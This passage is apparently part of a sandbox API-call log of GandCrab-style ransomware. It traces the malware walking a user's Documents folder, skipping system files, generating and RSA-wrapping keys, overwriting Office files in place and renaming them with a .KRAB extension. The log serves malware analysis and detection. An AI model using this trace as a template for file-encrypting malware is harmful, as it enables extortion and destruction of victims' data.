(lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\") returned 32 [0088.447] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*" [0088.447] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0x1023cb8 [0088.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.448] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.448] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.448] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.448] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.448] lstrcmpW (lpString1="2GG6g.docx", lpString2=".") returned 1 [0088.448] lstrcmpW (lpString1="2GG6g.docx", lpString2="..") returned 1 [0088.448] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="2GG6g.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx" [0088.448] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.448] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx.KRAB") returned 47 [0088.448] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx") returned 42 [0088.448] lstrlenW (lpString=".docx") returned 5 [0088.448] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.449] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0088.449] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.449] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx") returned 42 [0088.449] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx") returned 42 [0088.449] lstrcmpiW (lpString1="2GG6g.docx", lpString2="desktop.ini") returned -1 [0088.449] lstrcmpiW (lpString1="2GG6g.docx", lpString2="autorun.inf") returned -1 [0088.449] lstrcmpiW (lpString1="2GG6g.docx", lpString2="ntuser.dat") returned -1 [0088.449] lstrcmpiW (lpString1="2GG6g.docx", lpString2="iconcache.db") returned -1 [0088.449] lstrcmpiW (lpString1="2GG6g.docx", lpString2="bootsect.bak") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="boot.ini") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="ntuser.dat.log") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="thumbs.db") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="ntldr") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="NTDETECT.COM") returned -1 [0088.450] lstrcmpiW (lpString1="2GG6g.docx", lpString2="Bootfont.bin") returned -1 [0088.450] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.450] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0088.452] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.455] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.455] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.455] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.455] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.455] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.456] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0088.458] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.459] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.459] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.459] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.459] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.459] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.459] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010c60) returned 1 [0088.462] CryptImportKey (in: hProv=0x1010c60, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0088.462] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.462] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.462] GetLastError () returned 0x0 [0088.462] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0088.462] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0088.462] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0088.464] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0088.464] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.464] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.464] GetLastError () returned 0x0 [0088.464] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0088.464] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0088.464] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\2gg6g.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.465] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.465] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.466] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xf563, lpOverlapped=0x0) returned 1 [0088.481] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff0a9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.481] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xf563, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xf563, lpOverlapped=0x0) returned 1 [0088.481] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.481] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.486] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.486] CloseHandle (hObject=0x434) returned 1 [0088.487] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.487] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\2gg6g.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\2GG6g.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\2gg6g.docx.krab")) returned 1 [0088.488] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.488] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.488] lstrcmpW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2=".") returned 1 [0088.488] lstrcmpW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="..") returned 1 [0088.488] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="97UWGu eP_g8WfbV.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx" [0088.488] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.489] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx.KRAB") returned 58 [0088.489] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx") returned 53 [0088.489] lstrlenW (lpString=".xlsx") returned 5 [0088.489] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.489] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0088.489] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.490] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx") returned 53 [0088.490] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx") returned 53 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="desktop.ini") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="autorun.inf") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="ntuser.dat") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="iconcache.db") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="bootsect.bak") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="boot.ini") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="ntuser.dat.log") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="thumbs.db") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="ntldr") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="NTDETECT.COM") returned -1 [0088.490] lstrcmpiW (lpString1="97UWGu eP_g8WfbV.xlsx", lpString2="Bootfont.bin") returned -1 [0088.490] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.491] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0088.492] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.493] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.493] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.493] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.493] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0088.493] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.493] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0088.495] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.495] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.496] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.496] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.496] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.496] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.496] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0088.498] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10235f8) returned 1 [0088.498] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.498] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.498] GetLastError () returned 0x0 [0088.498] CryptDestroyKey (hKey=0x10235f8) returned 1 [0088.498] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0088.498] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0088.500] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0088.500] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.500] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.501] GetLastError () returned 0x0 [0088.501] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0088.501] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0088.501] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\97uwgu ep_g8wfbv.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.501] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.502] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.502] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x5a8, lpOverlapped=0x0) returned 1 [0088.514] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffa58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.514] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5a8, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x5a8, lpOverlapped=0x0) returned 1 [0088.565] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.565] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.593] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.598] CloseHandle (hObject=0x434) returned 1 [0088.598] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.599] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\97uwgu ep_g8wfbv.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\97UWGu eP_g8WfbV.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\97uwgu ep_g8wfbv.xlsx.krab")) returned 1 [0088.600] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.600] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.600] lstrcmpW (lpString1="aQw_s38iF0k5m.pptx", lpString2=".") returned 1 [0088.600] lstrcmpW (lpString1="aQw_s38iF0k5m.pptx", lpString2="..") returned 1 [0088.600] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="aQw_s38iF0k5m.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx" [0088.600] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.600] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx.KRAB") returned 55 [0088.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx") returned 50 [0088.601] lstrlenW (lpString=".pptx") returned 5 [0088.601] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.601] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0088.601] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx") returned 50 [0088.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx") returned 50 [0088.601] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="desktop.ini") returned -1 [0088.601] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="autorun.inf") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="ntuser.dat") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="iconcache.db") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="bootsect.bak") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="boot.ini") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="ntuser.dat.log") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="thumbs.db") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="KRAB-DECRYPT.html") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="ntldr") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="NTDETECT.COM") returned -1 [0088.602] lstrcmpiW (lpString1="aQw_s38iF0k5m.pptx", lpString2="Bootfont.bin") returned -1 [0088.602] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.602] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0088.604] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.604] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.605] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.605] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.605] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0088.605] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.605] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0088.607] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.607] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.607] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.607] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.608] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0088.608] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.608] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010ce8) returned 1 [0088.610] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10235f8) returned 1 [0088.610] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.610] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.610] GetLastError () returned 0x0 [0088.610] CryptDestroyKey (hKey=0x10235f8) returned 1 [0088.610] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0088.610] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010a40) returned 1 [0088.612] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0088.612] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.612] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.612] GetLastError () returned 0x0 [0088.612] CryptDestroyKey (hKey=0x1023338) returned 1 [0088.612] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0088.612] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aQw_s38iF0k5m.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\aqw_s38if0k5m.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.613] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.613] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.614] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x18c22, lpOverlapped=0x0) returned 1 [0088.629] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffe73de, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.629] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18c22, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x18c22, lpOverlapped=0x0) returned 1 [0088.629] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) 